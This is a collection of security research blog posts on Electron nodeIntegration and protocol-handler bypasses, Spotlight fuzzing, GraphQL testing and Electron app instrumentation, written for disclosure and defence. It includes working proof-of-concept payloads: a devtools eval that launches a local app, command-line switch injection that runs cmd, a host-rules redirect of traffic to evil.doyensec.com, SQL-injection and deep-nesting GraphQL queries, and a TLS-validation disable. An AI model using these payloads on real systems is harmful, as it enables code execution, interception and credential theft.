It should now be clear why nodeIntegration is a critical security-relevant setting for the framework. A vulnerability in this mechanism could lead to full host compromise from simply rendering untrusted web pages. As modern alchemists, we use this type of flaws to turn traditional XSS into RCE. Since all Electron applications are bundled with the framework code, it is also complicated to fix these issues across the entire ecosystem.

During our research, we have extensively analyzed all project code changes to uncover previously discovered bypasses (we counted 6 before v1.6.1) with the goal of studying Electron’s design and weaknesses. Armed with that knowledge, we went for a hunt.

By studying the official documentation, we quickly identified a significant deviation from standard browsers caused by Electron’s “glorified” JavaScript APIs.

When a new window is created, Electron returns an instance of BrowserWindowProxy. This class can be used to manipulate the child browser window, thus subverting the Same-Origin Policy (SOP).

SOP Bypass #1

<script>
const win = window.open("https://www.doyensec.com"); 
win.location = "javascript:alert(document.domain)"; 
</script> 

SOP Bypass #2

<script>
const win = window.open("https://www.doyensec.com"); 
win.eval("alert(document.domain)");
</script>

The eval mechanism used by the SOP Bypass #2 can be explained with the following diagram:

BrowserWindowProxy's Eval

Additional source code review revealed the presence of privileged URLs (similar to browsers’ privileged zones). Combining the SOP-bypass by design with a specific privileged url defined in lib/renderer/init.js, we realized that we could override the nodeIntegration setting.

Chrome DevTools in Electron, prior to 1.6.8

A simple, yet reliable, proof-of-concept of the nodeIntegration bypass affecting all Electron releases prior to 1.6.7 is hereby included:

<!DOCTYPE html>
<html>
  <head>
    <title>nodeIntegration bypass (SOP2RCE)</title>
  </head>
  <body>
  	<script>
    	document.write("Current location:" + window.location.href + "<br>");

    	const win = window.open("chrome-devtools://devtools/bundled/inspector.html");
    	win.eval("const {shell} = require('electron'); 
    	shell.openExternal('file:///Applications/Calculator.app');");
       </script>
  </body>
</html>

On May 10, 2017 we reported this issue to the maintainers via email. In a matter of hours, we received a reply that they were already working on a fix since the privileged chrome-devtools:// was discovered during an internal security activity just few days before our report. In fact, while the latest release on the official website at that time was 1.6.7, the git commit that fixes the privileged url is dated April 24, 2017.

The issue was fixed in 1.6.8 (officially released around the 15th of May). All previous versions of Electron and consequently all Electron-based apps were affected. Mitre assigned CVE-2017-12581 for this issue.

Mitigating nodeIntegration bypass vulnerabilities

  • Keep your application in sync with the latest Electron framework release. When releasing your product, you’re also shipping a bundle composed of Electron, Chromium shared library and Node. Vulnerabilities affecting these components may impact the security of your application. By updating Electron to the latest version, you ensure that critical vulnerabilities (such as nodeIntegration bypasses) are already patched and cannot be exploited to abuse your application.

  • Adopt secure coding practices. The first line of defense for your application is your own code. Common web vulnerabilities, such as Cross-Site Scripting (XSS), have a higher security impact on Electron hence it is highly recommend to adopt secure software development best practices and perform periodic security testing.

  • Know your framework (and its limitations). Certain principles and security mechanisms implemented by modern browsers are not enforced in Electron (e.g. SOP enforcement). Adopt defense in depth mechanisms to mitigate those deficiencies. For more details, please refer to our Electronegativity, A study of Electron Security presentation and Electron Security Checklist white-paper.

  • Use the recent “sandbox” experimental feature. Even with nodeIntegration disabled, the current implementation of Electron does not completely mitigate all risks introduced by loading untrusted resources. As such, it is recommended to enable sandboxing which leverages the native Chromium sandbox. A sandboxed renderer does not have a Node.js environment running (with the exception of preload scripts) and the renderers can only make changes to the system by delegating tasks to the main process via IPC. While still not perfect at the time of writing (there are known security issues, sandbox is not supported for the <webview> tag, etc.) this option should be enabled to provide additional isolation.

Staring into the Spotlight

14 November 2017 at 23:00

Spotlight is the all pervasive seeing eye of the OSX userland. It drinks from a spout of file events sprayed out of the kernel and neatly indexes such things for later use. It is an amalgamation of binaries and libraries, all neatly fitted together just to give a user oversight of their box. It presents interesting attack surface and this blog post is an explanation of how some of it works.

One day, we found some interesting looking crashes recorded in /Users/<name>/Library/Logs/DiagnosticReports

Yet the crashes weren’t from the target. In OSX, whenever a file is created, a filesystem event is generated and sent down from the kernel. Spotlight listens for this event and others to immediately parse the created file for metadata. While fuzzing a native file parser these Spotlight crashes began to appear from mdworker processes. Spotlight was attempting to index each of the mutated input samples, intending to include them in search results later.

fsevents

The Spotlight system is overseen by mds. It opens and reads from /dev/fsevents, which streams down file system event information from the kernel. Instead of dumping the events to disk, like fseventsd, it dumps the events into worker processes to be parsed on behalf of Spotlight. Mds is responsible for delegating work and managing mdworker processes with whom it communicates through mach messaging. It creates, monitors, and kills mdworkers based on some light rules. The kernel does not block and the volume of events streaming through the fsevents device can be quite a lot. Mds will spawn more mdworker processes when handling a higher event magnitude but there is no guarantee it can see and capture every single event.

The kernel filters which root level processes can read from this device. fsevents filter

Each of the mdworker processes get spawned, parse some files, write the meta info, and die. Mdworker shares a lot of code with mdimport, its command line equivalent. The mdimport binary is used to debug and test Spotlight importers and therefore makes a great target for auditing and fuzzing. Much of what we talk about in regards to mdimport also applies to mdworker.

Importers

You can see what mdworkers are up to with the following: sudo fs_usage -w -f filesys mdworker

Importers are found in /Library/Spotlight, /System/Library/Spotlight, or in an application’s bundle within “/Contents/Library/Spotlight”. If the latter is chosen, the app typically runs a post install script with mdimport -r <importer> and/or lsregister. The following command shows the list of importers present on my laptop. It shows some third party apps have installed their own importers.

$ mdimport -L
2017-07-30 00:36:15.518 mdimport[40541:1884333] Paths: id(501) (
    "/Library/Spotlight/iBooksAuthor.mdimporter",
    "/Library/Spotlight/iWork.mdimporter",
    "/Library/Spotlight/Microsoft Office.mdimporter",
    "/System/Library/Spotlight/Application.mdimporter",
...
    "/System/Library/Spotlight/SystemPrefs.mdimporter",
    "/System/Library/Spotlight/vCard.mdimporter",
    "/Applications/Xcode.app/Contents/Applications/Application Loader.app/Contents/Library/Spotlight/MZSpotlight.mdimporter",
    "/Applications/LibreOffice.app/Contents/Library/Spotlight/OOoSpotlightImporter.mdimporter",
    "/Applications/OmniGraffle.app/Contents/Library/Spotlight/OmniGraffle.mdimporter",
    "/Applications/GarageBand.app/Contents/Library/Spotlight/LogicX_MDImport.mdimporter",
    "/Applications/Xcode.app/Contents/Library/Spotlight/uuid.mdimporter"
)

These .mdimporter files are actually just packages holding a binary. These binaries are what we are attacking.

Using mdimport is simple - mdimport <file>. Spotlight will only index metadata for filetypes having an associated importer. File types are identified through magic. For example, mdimport reads from the MAGIC environment variable or uses the “/usr/share/file/magic” directory which contains both the compiled .mgc file and the actual magic patterns. The format of magic files is discussed at the official Apple developer documentation.

Crash File

crash logging

One thing to notice is that the crash log will contain some helpful information about the cause. The following message gets logged by both mdworker and mdimport, which share much of the same code:

Application Specific Information:
import fstype:hfs fsflag:480D000 flags:40000007E diag:0 isXCode:0 uti:com.apple.truetype-datafork-suitcase-font plugin:/Library/Spotlight/Font.mdimporter - find suspect file using: sudo mdutil -t 2682437

The 2682437 is the iNode reference number for the file in question on disk. The -t argument to mdutil will ask it to lookup the file based on volume ID and iNode and spit out the string. It performs an open and fcntl on the pseudo directory /.vol/<Volume ID>/<File iNode>. You can see this info with the stat syscall on a file.

$ stat /etc
16777220 418395 lrwxr-xr-x 1 root wheel 0 11 "Dec 10 05:13:41 2016" "Dec 10 05:13:41 2016" "Dec 10 05:15:47 2016" "Dec 10 05:13:41 2016" 4096 8 0x88000 /etc

$ ls /.vol/16777220/418395
afpovertcp.cfg    fstab.hd            networks          protocols
aliases           ftpd.conf           newsyslog.conf    racoon
aliases.db        ftpd.conf.default   newsyslog.d       rc.common

The UTI registered by the importer is also shown “com.apple.truetype-datafork-suitcase-font”. In this case, the crash is caused by a malformed Datafork TrueType suitcase (.dfont) file.

When we find a bug, we can study it under lldb. Launch mdimport under the debugger with the crash file as an argument. In this particular bug it breaks with an exception in the /System/Library/Spotlight/Font.mdimporter importer.

crash logging

The screenshot below shows the problem procedure with the crashing instruction highlighted for this particular bug.

The rsi register points into the memory mapped font file. A value is read out and stored in rax which is then used as an offset from rcx which points to the text segment of the executable in memory. A lookup is done on a hardcoded table and parsing proceeds from there. The integer read out of the font file is never validated.

When writing or reversing a Spotlight importer, the main symbol to first look at will be GetMetadataForFile or GetMetadataForURL. This function receives a path to parse and is expected to return the metadata as a CFDictionary.

We can see, from the stacktrace, how and where mdimport jumps into the GetMetadataForFile function in the Font importer. Fuzzing mdimport is straightforward, crashes and signals are easily caught.

The variety of importers present on OSX are sometimes patched alongside the framework libraries, as code is shared. However, a lot of code is unique to these binaries and represents a nice attack surface. The Spotlight system is extensive, including its own query language and makes a great target where more research is needed.

When fuzzing in general on OSX, disable Spotlight oversight of the folder where you generate and remove your input samples. The folder can be added in System Preferences->Spotlight->Privacy. You can’t fuzz mdimport from this folder, instead disable Spotlight with “mdutil -i off” and run your fuzzer from a different folder.

@day6reak

We're hiring - Join Doyensec!

26 November 2017 at 23:00

At Doyensec, we believe that quality is the natural product of passion and care. We love what we do and we routinely take on difficult engineering challenges to help our customers build with security.

We are a small highly focused team. We concentrate on application security and do fewer things better. We don’t care about your education, background and certifications. If you are really good and passionate at building and breaking complex software, you’re the right candidate.

Open Positions

:: Full-stack Security Automation Engineer (Six Months Collaboration, Remote Work) ::

We are looking for a full-stack senior software engineer that can help us build security automation tools. If you’ve ever built a fuzzer, played with static analysis and enhanced a web scanner engine, you probably have the right skillset for the job.

We offer a well-paid six-months collaboration, combined with an additional bonus upon successful completion of the project.

Responsibilities:

  • Full-stack development (front-end, back-end components) of web security testing tools
  • Solve technical challenges at the edge of web security R&D, together with Doyensec’s founders

Requirements:

  • Experience developing multi-tiered software applications or products. We generally use Node.js and Java, and require proficiency in those languages
  • Ability to work with standard dev tools and techniques (IDE, git, …)
  • You’re passionate about building great software and can have fun while doing it
  • Interested in web security, with good understanding of common software vulnerabilities
  • You’re self-driven and can focus on a project to make it happen
  • Eager to learn, adapt and perfect your work

Contact us at [email protected]

:: Application Security Engineer (Full-time, Remote Work - Europe) ::

We are looking for an experienced security engineer to join our consulting team. We perform graybox security testing on complex web and mobile applications. We need someone who can hit the ground running. If you’re good at “crawling around in the ventilation ducts of the world’s most popular and important applications”, you probably have the right skillset for the job.

We offer a competitive salary in a supportive and dynamic environment that rewards hard work and talent. We are dedicated to providing research-driven application security and therefore invest 25% of your time exclusively to research where we build security testing tools, discover new attack techniques, and develop countermeasures.

Responsibilities:

  • Security testing of web, mobile (iOS, Android) applications
  • Vulnerability research activities, coordinated and executed with Doyensec’s founders
  • Partner with customers to ensure project’s objectives are achieved 

Requirements:

  • Ability to discover, document and fix security bugs
  • You’re passionate about understanding complex systems and can have fun while doing it
  • Top-notch in web security. Show us public research, code, advisories, etc.
  • Eager to learn, adapt, and perfect your work

Contact us at [email protected]

GraphQL - Security Overview and Testing Tips

16 May 2018 at 22:00

With the increasing popularity of GraphQL technology we are summarizing some documentation and tips about common security mistakes.

What is GraphQL?

GraphQL is a data query language developed by Facebook and publicly released in 2015. It is an alternative to REST API.

Even if you don’t see any GraphQL out there, it is likely you’re already using it since it’s running on some big tech giants like Facebook, GitHub, Pinterest, Twitter, HackerOne and a lot more.

A few key points on this technology

  • GraphQL provides a complete and understandable description of the data in the API and gives clients the power to ask for exactly what they need. Queries always return predictable results.

  • While typical REST APIs require loading from multiple URLs, GraphQL APIs get all the data your app needs in a single request.

  • GraphQL APIs are organized in terms of types and fields, not endpoints. You can access the full capabilities of all your data from a single endpoint.

  • GraphQL is strongly typed to ensure that application only ask for what’s possible and provide clear and helpful errors.

  • New fields and types can be added to the GraphQL API without impacting existing queries. Aging fields can be deprecated and hidden from tools.

Before we start diving into the GraphQL security landscape, here is a brief recap on how it works. The official documentation is well written and was really helpful.

A GraphQL query looks like this:

Basic GraphQL Query

query{
	user{
		id
		email
		firstName
		lastName
	}
}

While the response is JSON:

Basic GraphQL Response

{
	"data": {
		"user": {
			"id": "1",
			"email": "[email protected]",
			"firstName": "Paolo",
			"lastName": "Stagno"
		}
	}
}

Security Testing Tips

Since Burp Suite does not understand GraphQL syntax well, I recommend using the graphql-ide, an Electron based app that allows you to edit and send requests to a GraphQL endpoint; I also wrote a small python script GraphQL_Introspection.py that enumerates a GraphQL endpoint (with introspection) in order to pull out documentation. The script is useful for examining the GraphQL schema looking for information leakage, hidden data and fields that are not intended to be accessible.

The tool will generate a HTML report similar to the following:

Python Script pulling data from a GraphQL endpoint

Introspection is used to ask for a GraphQL schema for information about what queries, types and so on it supports.

As a pentester, I would recommend to look for requests issued to “/graphql” or “/graphql.php” since those are usual GraphQL endpoint names; you should also search for “/graphiql”, ”graphql/console/”, online GraphQL IDEs to interact with the backend, and “/graphql.php?debug=1” (debugging mode with additional error reporting) since they may be left open by developers.

When testing an application, verify whether requests can be issued without the usual authorization token header:

GraphQL Bearer Authorization Header Example

Since the GraphQL framework does not provide any means for securing your data, developers are in charge of implementing access control as stated in the documentation:

“However, for a production codebase, delegate authorization logic to the business logic layer”.

Things may go wrong, thus it is important to verify whether a user without proper authentication and/or authorization can request the whole underlying database from the server.

When building an application with GraphQL, developers have to map data to queries in their chosen database technology. This is where security vulnerabilities can be easily introduced, leading to Broken Access Controls, Insecure Direct Object References and even SQL/NoSQL Injections.

As an example of a broken implementation, the following request/response demonstrates that we can fetch data for any users of the platform (cycling through the ID parameter), while simultaneously dumping password hashes:

Query

query{
	user(id: 165274){
		id
		email
		firstName
		lastName
		password
	}
}

Response

{
	"data": {
		"user": {
			"id": "165274",
			"email": "[email protected]",
			"firstName": "John",
			"lastName": "Doe"
			"password": "5F4DCC3B5AA765D61D8327DEB882CF99"
		}
	}
}

Another thing that you will have to check is related to information disclosure when trying to perform illegal queries:

Information Disclosure

{
	"errors": [
		{
			"message": "Invalid ID.",
			"locations": [
				{
					"line": 2,
					"column": 12
				}
				"Stack": "Error: invalid ID\n at (/var/www/examples/04-bank/graphql.php)\n"
      			]
		}
	]
}

Even though GraphQL is strongly typed, SQL/NoSQL Injections are still possible since GraphQL is just a layer between client apps and the database. The problem may reside in the layer developed to fetch variables from GraphQL queries in order to interrogate the database; variables that are not properly sanitized lead to old simple SQL Injection. In case of Mongodb, NoSQL injection may not be that simple since we cannot “juggle” types (e.g. turning a string into an array. See PHP MongoDB Injection).

GraphQL SQL Injection

mutation search($filters Filters!){
	authors(filter: $filters)
	viewer{
		id
		email
		firstName
		lastName
	} 
}

{
	"filters":{
		"username":"paolo' or 1=1--"
		"minstories":0
	}
}

Beware of nested queries! They can allow a malicious client to perform a DoS (Denial of Service) attack via overly complex queries that will consume all the resources of the server:

Nested Query

query {
 stories{
  title
  body
  comments{
   comment
   author{
    comments{
     author{
      comments{
       comment
       author{
        comments{
         comment
         author{
          comments{
           comment
           author{
            name
           }
          }
         }
        }
       }
      }
     }
    }
   }
  }
 }
}

An easy remediation against DoS could be setting a timeout, a maximum depth or a query complexity threshold value.

Keep in mind that in the PHP GraphQL implementation:

  • Complexity analysis is disabled by default

  • Limiting Query Depth is disabled by default

  • Introspection is enabled by default. It means that anybody can get a full description of your schema by sending a special query containing meta fields type and schema

Outro

GraphQL is a new interesting technology, which can be used to build secure applications. Since developers are in charge of implementing access control, applications are prone to classical web application vulnerabilites like Broken Access Controls, Insecure Direct Object References, Cross Site Scripting (XSS) and Classic Injection Bugs. As any technology, GraphQL-based applications may be prone to development implementation errors like this real-life example:

“By using a script, an entire country’s (I tested with the US, the UK and Canada) possible number combinations can be run through these URLs, and if a number is associated with a Facebook account, it can then be associated with a name and further details (images, and so on).”

@voidsec

Resources:

Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix)

23 May 2018 at 22:00

As part of an engagement for one of our clients, we analyzed the patch for the recent Electron Windows Protocol handler RCE bug (CVE-2018-1000006) and identified a bypass.

Under certain circumstances this bypass leads to session hijacking and remote code execution. The vulnerability is triggered by simply visiting a web page through a browser. Electron apps designed to run on Windows that register themselves as the default handler for a protocol and do not prepend dash-dash in the registry entry are affected.

We reported the issue to the Electron core team (via [email protected]) on May 14, 2018 and received immediate notification that they were already working on a patch. The issue was also reported by Google’s Nicolas Ruff a few days earlier.

CVE-2018-1000006

On January 22, 2018 Electron released a patch for v1.7.11, v1.6.16 and v1.8.2-beta4 for a critical vulnerability known as CVE-2018-1000006 (surprisingly no fancy name here) affecting Electron-based applications running on Windows that register custom protocol handlers.

The original issue was extensively discussed in many blog posts, and can be summarized as the ability to use custom protocol handlers (e.g. myapp://) from a remote web page to piggyback command line arguments and insert a new switch that Electron/Chromium/Node would recognize and execute while launching the application.

<script>
win.location = 'myapp://foobar" --gpu-launcher="cmd c/ start calc" --foobar='
</script>

Interestingly, on January 31, 2018, Electron v1.7.12, v1.6.17 and v1.8.2-beta5 were released. It turned out that the initial patch did not take into account uppercase characters and led to a bypass in the previous patch with:

<script>
win.location = 'myapp://foobar" --GPU-launcher="cmd c/ start calc" --foobar='
</script> 

Understanding the patch

The patch for CVE-2018-1000006 is implemented in electron/atom/app/command_line_args.cc and consists of a validation mechanism which ensures users won’t be able to include Electron/Chromium/Node arguments after a url (the specific protocol handler). Bear in mind some locally executed applications do require the ability to pass custom arguments.

bool CheckCommandLineArguments(int argc, base::CommandLine::CharType** argv) {
  DCHECK(std::is_sorted(std::begin(kBlacklist), std::end(kBlacklist),
                        [](const char* a, const char* b) {
                          return base::StringPiece(a) < base::StringPiece(b);
                        }))
      << "The kBlacklist must be in sorted order";
  DCHECK(std::binary_search(std::begin(kBlacklist), std::end(kBlacklist),
                            base::StringPiece("inspect")))
      << "Remember to add Node command line flags to kBlacklist";

  const base::CommandLine::StringType dashdash(2, '-');
  bool block_blacklisted_args = false;
  for (int i = 0; i < argc; ++i) {
    if (argv[i] == dashdash)
      break;
    if (block_blacklisted_args) {
      if (IsBlacklistedArg(argv[i]))
        return false;
    } else if (IsUrlArg(argv[i])) {
      block_blacklisted_args = true;
    }
  }
  return true;
}

As is commonly seen, blacklist-based validation is prone to errors and omissions especially in complex execution environments like Electron:

  • The patch relies on a static blacklist of available chromium flags. On each libchromiumcontent update the Electron team must remember to update the command_line_args.cc file in order to make sure the blacklist is aligned with the current implementation of Chromium/v8
  • The blacklist is implemented using a binary search. Valid flags could be missed by the check if they’re not properly sorted

Bypass and security implications

We started looking for missed flags and noticed that host-rules was absent from the blacklist. With this flag one may specify a set of rules to rewrite domain names for requests issued by libchroumiumcontent. This immediately stuck out as a good candidate for subverting the process.

In fact, an attacker can exploit this issue by overriding the host definitions in order to perform completely transparent Man-In-The-Middle:

<!doctype html>
<script>
 window.location = 'skype://user?userinfo" --host-rules="MAP * evil.doyensec.com" --foobar='
</script>

When a user visits a web page in a browser containing the preceding code, the Skype app will be launched and all Chromium traffic will be forwarded to evil.doyensec.com instead of the original domain. Since the connection is made to the attacker-controlled host, certificate validation does not help as demonstrated in the following video:

We analyzed the impact of this vulnerability on popular Electron-based apps and developed working proof-of-concepts for both MITM and RCE attacks. While the immediate implication is that an attacker can obtain confidential data (e.g. oauth tokens), this issue can be also abused to inject malicious HTML responses containing XSS -> RCE payloads. With nodeIntegration enabled, this is simply achieved by leveraging Node’s APIs. When encountering application sandboxing via nodeIntegration: false or sandbox, it is necessary to chain this with other bugs (e.g. nodeIntegration bypass or IPC abuses).

Please note it is only possible to intercept traffic generated by Chromium, and not Node. For this reason Electron’s update feature, along with other critical functionss, are not affected by this vulnerability.

Future

On May 16, 2018, Electron released a new update containing an improved version of the blacklist for v2.0.1, v1.8.7, and v1.7.15. The team is actively working on a more resilient solution to prevent further bypasses. Considering that the API change may potentially break existing apps, it makes sense to see this security improvement within a major release.

In the meantime, Electron application developers are recommended to enforce a dash-dash notation in setAsDefaultProtocolClient

app.setAsDefaultProtocolClient(protocol, process.execPath, [
  '--your-switches-here',
  '--'
])

or in the Windows protocol handler registry entry

secure Windows protocol handler

As a final remark, we would like to thank the entire Electron team for their work on moving to a secure-by-default framework. Electron contributors are tasked with the non-trivial mission of closing the web-native desktop gap. Modern browsers are enforcing numerous security mechanisms to ensure isolation between sites, facilitate web security protections and prevent untrusted remote content from compromising the security of the host. When working with Electron, things get even more complicated.

@ikkisoft

@day6reak

Instrumenting Electron Apps for Security Testing

18 July 2018 at 22:00

Instrumenting Electron-based applications

With the increasing popularity of the Electron Framework, we have created this post to summarize a few techniques which can be used to instrument an Electron-based application, change its behavior, and perform in-depth security assessments.

Electron and processes

The Electron Framework is used to develop multi-platform desktop applications with nothing more than HTML, JavaScript and CSS. It has two core components: Node.js and the libchromiumcontent module from the Chromium project.

In Electron, the main process is the process that runs package.json’s main script. This component has access to Node.js primitives and is responsible for starting other processes. Chromium is used for displaying web pages, which are rendered in separate processes called renderer processes.

Unlike regular browsers where web pages run in a sandboxed environment and do not have access to native system resources, Electron renderers have access to Node.js primitives and allow lower level integration with the underlying operating system. Electron exposes full access to native Node.js APIs, but it also facilitates the use of external Node.js NPM modules.

As you might have guessed from recent public security vulnerabilities, the security implications are substantial since JavaScript code can access the filesystem, user shell, and many more primitives. The inherent security risks increase with the additional power granted to application code. For instance, displaying arbitrary content from untrusted sources inside a non-isolated renderer is a severe security risk. You can read more about Electron Security, hardening and vulnerabilities prevention in the official Security Recommendations document.

Unpacking the ASAR archive

The first thing to do to inspect the source code of an Electron-based application is to unpack the application bundle (.asar file). ASAR archives are a simple tar-like format that concatenates files into a single one.

First locate the main ASAR archive of our app, usually named core.asar or app.asar.

Once we have this file we can proceed with installing the asar utility: npm install -g asar

and extract the whole archive: asar extract core.asar destinationfolder

At its simplest version, an Electron application includes three files: index.js, index.html and package.json.

Our first target to inspect is the package.json file, as it holds the path of the file responsible for the “entry point” of our application:

{
  "name": "Example App",
  "description": "Core App",
  "main": "app/index.js",
  "private": true,
}

In our example the entry point is the file called index.js located within the app folder, which will be executed as the main process. If not specified, index.js is the default main file. The file index.html and other web resources are used in renderer processes to display actual content to the user. A new renderer process is created for every browserWindow instantiated in the main process.

In order to be able to follow functions and methods in our favorite IDE, it is recommended to resolve the dependencies of our app:

npm install

We should also install Devtron, a tool (built on top of the Chrome Developer Tools) to inspect, monitor and debug our Electron app. For Devtron to work, NodeIntegration must be on.

npm install --save-dev devtron

Then, run the following from the Console tab of the Developer Tools

require('devtron').install()

Dealing with obfuscated javascript

Whenever the application is neither minimized nor obfuscated, we can easily inspect the code.

'use strict';

Object.defineProperty(exports, "__esModule", {
  value: true
});
exports.startup = startup;
exports.handleSingleInstance = handleSingleInstance;
exports.setMainWindowVisible = setMainWindowVisible;

var _require = require('electron'),
    Menu = _require.Menu;

var mainScreen = void 0;
function startup(bootstrapModules) {
[ -- cut -- ]

In case of obfuscation, there are no silver bullets to unfold heavily manipulated javascript code. In these situations, a combination of automatic tools and manual reverse engineering is required to get back to the original source.

Take this horrendous piece of JS as an example:

eval(function(c,d,e,f,g,h){g=function(i){return(i<d?'':g(parseInt(i/d)))+((i=i%d)>0x23?String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'](i+0x1d):i['\x74\x6f\x53\x74\x72\x69\x6e\x67'](0x24));};while(e--){if(f[e]){c=c['\x72\x65\x70\x6c\x61\x63\x65'](new RegExp('\x5c\x62'+g(e)+'\x5c\x62','\x67'),f[e]);}}return c;}('\x62\x20\x35\x3d\x5b\x22\x5c\x6f\x5c\x38\x5c\x70\x5c\x73\x5c\x34\x5c\x63\x5c\x63\x5c\x37\x22\x2c\x22\x5c\x72\x5c\x34\x5c\x64\x5c\x74\x5c\x37\x5c\x67\x5c\x6d\x5c\x64\x22\x2c\x22\x5c\x75\x5c\x34\x5c\x66\x5c\x66\x5c\x38\x5c\x71\x5c\x34\x5c\x36\x5c\x6c\x5c\x36\x22\x2c\x22\x5c\x6e\x5c\x37\x5c\x67\x5c\x36\x5c\x38\x5c\x77\x5c\x34\x5c\x36\x5c\x42\x5c\x34\x5c\x63\x5c\x43\x5c\x37\x5c\x76\x5c\x34\x5c\x41\x22\x5d\x3b\x39\x20\x6b\x28\x65\x29\x7b\x62\x20\x61\x3d\x30\x3b\x6a\x5b\x35\x5b\x30\x5d\x5d\x3d\x39\x28\x68\x29\x7b\x61\x2b\x2b\x3b\x78\x28\x65\x2b\x68\x29\x7d\x3b\x6a\x5b\x35\x5b\x31\x5d\x5d\x3d\x39\x28\x29\x7b\x79\x20\x61\x7d\x7d\x62\x20\x69\x3d\x7a\x20\x6b\x28\x35\x5b\x32\x5d\x29\x3b\x69\x2e\x44\x28\x35\x5b\x33\x5d\x29',0x28,0x28,'\x7c\x7c\x7c\x7c\x78\x36\x35\x7c\x5f\x30\x7c\x78\x32\x30\x7c\x78\x36\x46\x7c\x78\x36\x31\x7c\x66\x75\x6e\x63\x74\x69\x6f\x6e\x7c\x5f\x31\x7c\x76\x61\x72\x7c\x78\x36\x43\x7c\x78\x37\x34\x7c\x5f\x32\x7c\x78\x37\x33\x7c\x78\x37\x35\x7c\x5f\x33\x7c\x6f\x62\x6a\x7c\x74\x68\x69\x73\x7c\x4e\x65\x77\x4f\x62\x6a\x65\x63\x74\x7c\x78\x33\x41\x7c\x78\x36\x45\x7c\x78\x35\x39\x7c\x78\x35\x33\x7c\x78\x37\x39\x7c\x78\x36\x37\x7c\x78\x34\x37\x7c\x78\x34\x38\x7c\x78\x34\x33\x7c\x78\x34\x44\x7c\x78\x36\x44\x7c\x78\x37\x32\x7c\x61\x6c\x65\x72\x74\x7c\x72\x65\x74\x75\x72\x6e\x7c\x6e\x65\x77\x7c\x78\x32\x45\x7c\x78\x37\x37\x7c\x78\x36\x33\x7c\x53\x61\x79\x48\x65\x6c\x6c\x6f'['\x73\x70\x6c\x69\x74']('\x7c')));

It can be manually turned into:

eval(function (c, d, e, f, g, h) {
    g = function (i) {
        return (i < d ? '' : g(parseInt(i / d))) + ((i = i % d) > 35 ? String['fromCharCode'](i + 29) : i['toString'](36));
    };
    while (e--) {
        if (f[e]) {
            c = c['replace'](new RegExp('\\b' + g(e) + '\\b', 'g'), f[e]);
        }
    }
    return c;
}('b 5=["\\o\\8\\p\\s\\4\\c\\c\\7","\\r\\4\\d\\t\\7\\g\\m\\d","\\u\\4\\f\\f\\8\\q\\4\\6\\l\\6","\\n\\7\\g\\6\\8\\w\\4\\6\\B\\4\\c\\C\\7\\v\\4\\A"];9 k(e){b a=0;j[5[0]]=9(h){a++;x(e+h)};j[5[1]]=9(){y a}}b i=z k(5[2]);i.D(5[3])', 40, 40, '||||x65|_0|x20|x6F|x61|function|_1|var|x6C|x74|_2|x73|x75|_3|obj|this|NewObject|x3A|x6E|x59|x53|x79|x67|x47|x48|x43|x4D|x6D|x72|alert|return|new|x2E|x77|x63|SayHello'['split']('|')));

Then, it can be passed to JStillery, JS Nice and other similar tools in order to get back a human readable version.

'use strict';
var _0 = ["SayHello", "GetCount", "Message : ", "You are welcome."];
function NewObject(contentsOfMyTextFile) {
  var _1 = 0;
  this[_0[0]] = function(theLibrary) {
    _1++;
    alert(contentsOfMyTextFile + theLibrary);
  };
  this[_0[1]] = function() {
    return _1;
  };
}
var obj = new NewObject(_0[2]);
obj.SayHello(_0[3]);

Enabling the developer tools in the renderer process

During testing, it is particularly important to review all web resources as we would normally do in a standard web application assessment. For this reason, it is highly recommended to enable the Developer Tools in all renderers and <webview> tags.

Electron’s Main process can use the BrowserWindow API to call the BrowserWindow method and instantiate a new renderer.

In the example below, we are creating a new BrowserWindow instance with specific attributes. Additionally, we can insert a new statement to launch the Developer tools:

/app/mainScreen.js

var winOptions = {
    title: 'Example App',
    backgroundColor: '#ffffff',
    width: DEFAULT_WIDTH,
    height: DEFAULT_HEIGHT,
    minWidth: MIN_WIDTH,
    minHeight: MIN_HEIGHT,
    transparent: false,
    frame: false,
    resizable: true,
    show: isVisible,
    webPreferences: {
      nodeIntegration: false,
      preload: _path2.default.join(__dirname, 'preload.js')
    }
  };

[ -- cut -- ]

mainWindow = new _electron.BrowserWindow(winOptions);
  winId = win.id;

//|--> HERE we can hook and add the Developers Tools <--|
win.webContents.openDevTools({ mode: 'bottom' })
win.setMenuBarVisibility(true);

If everything worked fine, we should have the Developers Tools enabled for the main UI screen.

From the main Developer Tool console, we can open additional developer tools windows for other renderers (e.g. webview tags).

window.document.getElementsByTagName("webview")[0].openDevTools()

While reading the code above, have you noticed the webPreference options?

WebPreferences options are basically settings for the renderer process and include things like window size, appearance, colors, security features, etc. Some of these settings are pretty useful for debugging purposes too.

For example, we can make all windows visible by using the show property of WebPreferences:

BrowserWindow({show: true})

Adding debugging statements

During instrumentation, it is useful to include debugging code such as

console.log("\n--------------- Debug --------------------\n")
console.log(process.type)
console.log(process.pid)
console.log(process.argv)
console.log("\n--------------- Debug --------------------\n")

Debugging the main process

Since it is not possible to open the developer tools for the Main Process, debugging this component is a bit trickier. Luckily, Chromium’s Developer Tools can be used to debug Electron’s main process with just a minor adjustment.

The DevTools in an Electron browser window can only debug JavaScript executed in that window (i.e. the web page). To debug JavaScript executed in the main process you will need to leverage the native debugger and launch Electron with the --inspect or --inspect-brk switch.

Use one of the following command line switches to enable debugging of the main process:

–inspect=[port] Electron will listen for V8 inspector protocol messages on the specified port, an external debugger will need to connect on this port. The default port is 5858.

–inspect-brk=[port] Like –inspect but pauses execution on the first line of JavaScript.

Usage: electron --inspect=5858 your-app

You can now connect Chrome by visiting chrome://inspect and analyze the launched Electron app present there.

Intercepting HTTP(s) traffic

Chromium supports system proxy settings on all platforms, so setup a proxy and then add Burp CA as usual.

We can even use the following command line argument if you run the Electron application directly. Please note that this does not work when using the bundled app.

--proxy-server=address:port

Or, programmatically with these lines in the main app:

const {app} = require('electron') 
app.commandLine.appendSwitch('proxy-server', '127.0.0.1:8080')

For Node, use transparent proxying by either changing /etc/hosts or overriding configs:

npm config set proxy http://localhost:8080
npm config set https-proxy http://localhost:8081

In case you need to revert the proxy settings, use:

npm config rm proxy
npm config rm https-proxy

However, you need to disable TLS validation with the following code within the application under testing:

process.env.NODE_TLS_REJECT_UNAUTHORIZED = “0";

Outro

